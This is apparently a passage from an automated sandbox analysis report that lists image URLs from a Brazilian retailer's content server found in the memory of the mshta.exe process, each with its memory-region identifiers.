Source: mshta.exe, 00000000.00000003.25387195053.0000000009498000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460055106.0000000009499000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25483067845.0000000006EDD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392497277.00000000095A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.00000000095A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386992749.0000000003028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378553891.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377901544.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397933321.0000000006EC2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.000000000955E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25399279067.000000000A916000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484434504.000000000949C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000A9E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25375820983.0000000006E97000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404882839.000000000A919000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25483822375.00000000093C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25443579320.00000000095A6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386040349.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25398775142.000000000A914000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/06/12/atalhos-esporte-fitness-e-lazer-5b7f212400c3
Source: mshta.exe, 00000000.00000003.25379781338.00000000094EA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25465016480.000000000AA25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397453283.00000000094F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25444845667.0000000009564000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25317648569.00000000067B5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25444767802.000000000950D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484648425.00000000094C3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25385047921.00000000094B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.000000000955E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25478844378.000000000AA25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25464408600.0000000009511000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25395346989.00000000094B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25483822375.00000000093C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000AA25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410456399.00000000094BA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25385047921.00000000094EA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25317838412.00000000067E1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25444617125.00000000094C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410145601.00000000094F5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25443682382.000000000955F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392497277.000000000955E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/06/25/DESK_APP-ATL-SERVICO-GIFTCARD-9f3f630fb4f0-4
Source: mshta.exe, 00000000.00000003.25386576642.000000000947B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25394294677.00000000094F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387195053.0000000009498000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.00000000094EA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25465016480.000000000AA25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387415599.0000000006F38000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397453283.00000000094F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460055106.0000000009499000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25317610092.00000000067E5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378553891.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25375820983.0000000006F38000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404918834.000000000947C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25464701881.0000000006F38000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25478844378.000000000AA25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484434504.000000000949C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25483416952.0000000006F3B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000AA25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25411198817.0000000006F38000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386040349.0000000009497000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/07/04/baixeapp-qr_desk-1-140b56c95cd2.png
Source: mshta.exe, 00000000.00000003.25387195053.0000000009498000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460055106.0000000009499000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378553891.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484434504.000000000949C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386040349.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386906783.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402240267.0000000009499000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/07/04/baixeapp-qr_desk-1-140b56c95cd2.png%
Source: mshta.exe, 00000000.00000003.25386576642.000000000947B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404918834.000000000947C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410207961.000000000947C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/07/04/baixeapp-qr_desk-1-140b56c95cd2.png-
Source: mshta.exe, 00000000.00000003.25394294677.00000000094F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.00000000094EA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397453283.00000000094F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25444767802.000000000950D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25385047921.00000000094EA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410145601.00000000094F5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25411529883.0000000009507000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/07/04/baixeapp-qr_desk-1-140b56c95cd2.png9.png
Source: mshta.exe, 00000000.00000003.25386576642.000000000947B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404918834.000000000947C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410207961.000000000947C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/07/04/baixeapp-qr_desk-1-140b56c95cd2.pngM
Source: mshta.exe, 00000000.00000003.25387195053.0000000009498000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460055106.0000000009499000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378553891.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484434504.000000000949C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386040349.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386906783.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402240267.0000000009499000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/07/04/baixeapp-qr_desk-1-140b56c95cd2.pngg
Source: mshta.exe, 00000000.00000003.25386576642.000000000947B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387415599.0000000006F38000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25375820983.0000000006F2A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386992749.0000000003028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25463690570.0000000006F2A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387415599.0000000006F2A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25411198817.0000000006F2A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377901544.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25375820983.0000000006F38000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404918834.000000000947C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25465160079.0000000006F2A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25464701881.0000000006F38000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000A9E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25483416952.0000000006F3B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25411198817.0000000006F38000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25483283460.0000000006F2D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/08/05/bn-tt_mercado-1-b820f7d67f0c.png
Source: mshta.exe, 00000000.00000003.25386576642.000000000947B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404918834.000000000947C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410207961.000000000947C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/08/05/bn-tt_mercado-1-b820f7d67f0c.pngeri
Source: mshta.exe, 00000000.00000003.25386576642.000000000947B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404918834.000000000947C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410207961.000000000947C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/08/05/bn-tt_mercado-1-b820f7d67f0c.pngeso
Source: mshta.exe, 00000000.00000003.25386576642.000000000947B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400030275.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25399279067.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387415599.0000000006F38000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484225410.0000000009487000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25483562137.0000000006F53000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404984172.000000000A955000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25395079124.0000000009491000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484313648.0000000009491000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377901544.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25375820983.0000000006F38000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25464701881.0000000006F38000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397841078.000000000B73B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25490436836.000000000B73C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402472105.000000000A954000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386906783.0000000009491000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000A9E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25483416952.0000000006F3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/08/05/bn-tt_mercado-e904efa9812b.png
Source: mshta.exe, 00000000.00000003.25400030275.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25399279067.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404984172.000000000A955000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402472105.000000000A954000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25486183528.000000000A957000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/08/05/bn-tt_mercado-e904efa9812b.pngw
Source: mshta.exe, 00000000.00000003.25386040349.00000000094A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387415599.0000000006F38000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410037652.00000000094AB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386992749.0000000003028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378553891.000000000944F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377901544.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25458566580.0000000006EC2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25375820983.0000000006F38000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.00000000094A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397933321.0000000006EC2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25464701881.0000000006F38000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25393422841.00000000094A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000A9E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25483416952.0000000006F3B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25375820983.0000000006E97000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25411198817.0000000006F38000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25479261865.0000000002FD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/10/14/topinho-desk-app-0daad7b9295c-011ca42e3f6b.w
Source: mshta.exe, 00000000.00000003.25387195053.0000000009498000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460055106.0000000009499000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25477923652.0000000006ED2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392497277.00000000095A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.00000000095A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386992749.0000000003028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378553891.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25444186991.000000000A923000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377901544.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25485163864.00000000095B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397933321.0000000006EC2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25399279067.000000000A916000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25317891511.000000000677A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484434504.000000000949C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000A9E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25375820983.0000000006E97000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410412246.0000000006ED0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400030275.000000000A922000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386040349.0000000009497000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/10/16/MACROSSHome2-432x540px-cb8bf5b6c936.png
Source: mshta.exe, 00000000.00000003.25387195053.0000000009498000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460055106.0000000009499000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378553891.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484434504.000000000949C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386040349.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386906783.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402240267.0000000009499000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/10/16/MACROSSHome2-432x540px-cb8bf5b6c936.pngm
Source: mshta.exe, 00000000.00000003.25394294677.00000000094F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.00000000094EA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397453283.00000000094F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25444767802.000000000950D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484826803.000000000950E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25385047921.00000000094EA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410145601.00000000094F5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25411529883.0000000009507000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/10/16/MACROSSHome2-432x540px-cb8bf5b6c936.pngn
Source: mshta.exe, 00000000.00000003.25394294677.00000000094F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.00000000094EA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25465016480.000000000AA25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387415599.0000000006F38000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397453283.00000000094F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25487528616.000000000AB7B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25317648569.00000000067B5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377467003.000000000AB7B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386820435.000000000946F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25444767802.000000000950D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484826803.000000000950E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25375820983.0000000006F38000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25464701881.0000000006F38000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25478844378.000000000AA25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25483416952.0000000006F3B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000AA25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25411198817.0000000006F38000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25385047921.00000000094EA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/02/250x260-atalho-app-Natal-9b95a4d5fb69.png
Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386820435.000000000946F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410252202.0000000009470000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386618817.0000000009462000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402152855.0000000009470000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/02/250x260-atalho-app-Natal-9b95a4d5fb69.png-s
Source: mshta.exe, 00000000.00000003.25379781338.00000000094EA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25385047921.00000000094EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/02/250x260-atalho-app-Natal-9b95a4d5fb69.png7;
Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386820435.000000000946F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410252202.0000000009470000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386618817.0000000009462000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402152855.0000000009470000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/02/250x260-atalho-app-Natal-9b95a4d5fb69.pngat
Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386820435.000000000946F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410252202.0000000009470000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386618817.0000000009462000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402152855.0000000009470000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/02/250x260-atalho-app-Natal-9b95a4d5fb69.pngis
Source: mshta.exe, 00000000.00000003.25379781338.00000000094EA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25398256426.00000000094EB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25394294677.00000000094EA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25385047921.00000000094EA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25396803939.00000000094EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/02/250x260-atalho-app-Natal-9b95a4d5fb69.pngl;
Source: mshta.exe, 00000000.00000003.25379781338.00000000094EA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25385047921.00000000094EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/02/250x260-atalho-app-Natal-9b95a4d5fb69.pngw?
Source: mshta.exe, 00000000.00000003.25379781338.00000000094EA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25465016480.000000000AA25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379542505.000000000AC79000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460055106.0000000009499000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25487528616.000000000AB7B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25317648569.00000000067B5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25459467924.000000000AC79000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25411576650.000000000951C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25399279067.000000000A948000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377467003.000000000AB7B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25398726849.0000000009517000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378553891.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.000000000955E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25478844378.000000000AA25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484434504.000000000949C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000AA25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410939908.000000000A94C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397453283.0000000009517000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386040349.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25385047921.00000000094EA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 